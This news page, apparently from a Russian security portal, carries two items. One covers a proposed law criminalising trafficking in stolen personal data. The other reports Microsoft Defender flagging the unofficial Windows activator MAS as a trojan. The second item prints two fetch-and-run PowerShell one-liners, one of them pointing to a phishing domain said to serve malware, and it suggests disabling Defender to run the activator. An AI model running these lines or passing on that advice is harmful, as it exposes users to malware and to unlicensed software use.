Эксперты оценили идею уголовного срока за утечки

Эксперты оценили идею уголовного срока за утечки

Эксперты оценили идею уголовного срока за утечки

В Госдуме готовится к рассмотрению законопроект об уголовной ответственности за незаконный оборот украденных персональных данных. Кого именно и за что смогут наказать, пока неизвестно. Эксперты ждут формулировок.

О том, что правительство одобрило законопроект, предполагающий уголовную ответственность за незаконный оборот украденных персональных данных, стало известно на минувшей неделе. Пока сам документ не опубликован, “Известия” собрали мнения экспертов.

Пока неясно главное: кого и за какие именно действия будет предложено привлекать к ответственности, говорит партнер адвокатского бюро “Юрлов и партнеры” Глеб Ситников.

По его словам, важнее всего то, будут ли адекватно раскрыты в законопроекте понятия, которые пока на словах звучат как “оборот” и “украденные персональные данные”.

Криминализация незаконного оборота ПД может оздоровить ситуацию с участившимися утечками данных, считает Ситников.

“Вопросы вызывает то, насколько готовы к огромным затратам времени и денег на соблюдение всех требований небольшие и не технологические компании и предприниматели и насколько они заслуживают ужесточения ответственности при несоразмерной сложности и запутанности норм о ПД”, — предупреждает эксперт.

“Что значит способствовать утечкам? Кто и как будет определять степень способствования? На мой взгляд, наказание за незаконный оборот данных всё-таки должно зависеть от последствий, к которому он привел”, — считает исполнительный директор российской ИТ-компании HFLabs Константин Степанов.

Если из компании утекли данные, можно установить того, кто этому прямо или косвенно поспособствовал, но меры воздействия в любом случае должны зависеть от того, был это злонамеренный шаг или нет, говорит Степанов.

Уголовное наказание за “пробив”, к слову, есть и сейчас. На нем регулярно попадаются, например, сотрудники салонов связи. Что касается оборота данных в даркнете, то найти людей, которые стоят за их продажей, будет сложно. Скорей всего, многие из них находятся не в России, предполагает эксперт.

Напомним, по последним данным, в прошлом году в Сеть утекло 311 баз российских компаний.

На этом фоне член СПЧ Кирилл Кабанов выступил с предложением включить в качестве основания для замены паспорта утечку персональных данных.

“Гражданин должен получить право в случае подобной ситуации (утечки) по желанию заменить свой паспорт с целью предотвращения рисков мошеннических действий”, — сообщил Кабанов в своем телеграм-канале.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru